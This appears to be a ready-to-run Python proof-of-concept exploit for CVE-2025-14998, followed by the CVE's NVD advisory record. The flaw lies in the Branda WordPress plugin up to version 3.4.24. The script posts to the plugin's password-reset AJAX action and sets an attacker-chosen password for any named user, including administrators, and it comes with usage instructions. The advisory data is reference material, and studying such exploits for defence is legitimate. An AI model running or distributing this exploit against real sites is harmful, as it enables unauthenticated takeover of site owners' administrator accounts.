CVE-2025-14998

import requests import sys def exploit_cve_2025_14998(target_url, target_username, attacker_password): """ PoC for CVE-2025-14998: Branda WordPress Plugin Account Takeover This exploits the privilege escalation vulnerability in Branda plugin < 3.4.25 """ # Vulnerable endpoint - Branda signup password reset endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { 'action': 'branda_signup_password_reset', 'username': target_username, 'new_password': attacker_password, 'confirm_password': attacker_password } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Targeting: {target_url}") print(f"[*] Target username: {target_username}") print(f"[*] Attempting password change...") try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: if 'success' in response.text or response.json().get('success'): print("[+] Password change successful!") print(f"[+] New password set: {attacker_password}") return True print("[-] Password change failed or plugin not vulnerable") return False except requests.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <new_password>") print(f"Example: python {sys.argv[0]} http://example.com admin P@ssw0rd123") sys.exit(1) exploit_cve_2025_14998(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2025-14998", "sourceIdentifier": "[email protected]", "published": "2026-01-02T03:15:50.940", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account."}, {"lang": "es", "value": "El plugin Branda para WordPress es vulnerable a escalada de privilegios mediante toma de control de cuenta en todas las versiones hasta la 3.4.24, inclusive. Esto se debe a que el plugin no valida correctamente la identidad de un usuario antes de actualizar su contraseña. Esto hace posible que atacantes no autenticados cambien las contraseñas de usuarios arbitrarios, incluidos los administradores, y aprovechen eso para obtener acceso a su cuenta."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/branda-white-labeling/tags/3.4.24/inc/modules/login-screen/signup-password.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3429115/branda-white-labeling#file1749", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae46be82-570f-4172-9c3f-746b894b84b9?source=cve", "source": "[email protected]"}]}}